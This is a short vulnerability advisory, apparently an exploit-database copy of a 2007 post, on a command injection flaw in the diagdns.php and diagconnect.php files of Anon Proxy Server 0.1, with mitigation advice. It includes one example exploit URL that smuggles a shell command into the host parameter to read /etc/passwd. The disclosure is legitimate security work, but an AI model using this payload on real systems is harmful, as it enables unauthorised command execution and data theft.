Multiple Remote System commands execution in Anon Proxy Server

vendor:

Anon Proxy Server

by:

Michael Brooks

7.5

CVSS

HIGH

Multiple Remote System commands execution

CWE

Product Name: Anon Proxy Server

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: NO

Related CWE:

CPE: a:anon_proxy_server:anon_proxy_server:0.100

Metasploit:

Other Scripts:

Platforms Tested:

2007

Multiple Remote System commands execution in Anon Proxy Server

A flaw exists in diagdns.php in Anon Proxy Server which allows remote attackers to execute arbitrary commands via a crafted request. A virtually identical flaw also exists in diagconnect.php, but it takes longer to execute.

Mitigation:

The best temporary solution is to remove diagdns.php and diagconnect.php. Additionally, using the escapeshellarg() function can provide protection against this vulnerability. Anon Proxy Server will also need to revamp their security as magic_quotes_gpc is being removed in php6.

Source

Exploit-DB raw data:

By Michael Brooks
Vulnerability type: Multiple Remote System commands execution. 
Software: Anon Proxy Server
Home page:http://sourceforge.net/projects/anonproxyserver/
Affects version: 0.100

Example exploit:
http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23

A virtually identical flaw exists in diagconnect.php however it takes longer to execute.

Anon Proxy Server forces magic_quotes_gpc=on,  However magic_quotes_gpc does not protect the system()  function from taint.  For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution.  Also magic_quotes_gpc is being removed in php6,  so Anon Proxy Server will have to revamp there security. 

Peace

# milw0rm.com [2007-12-14]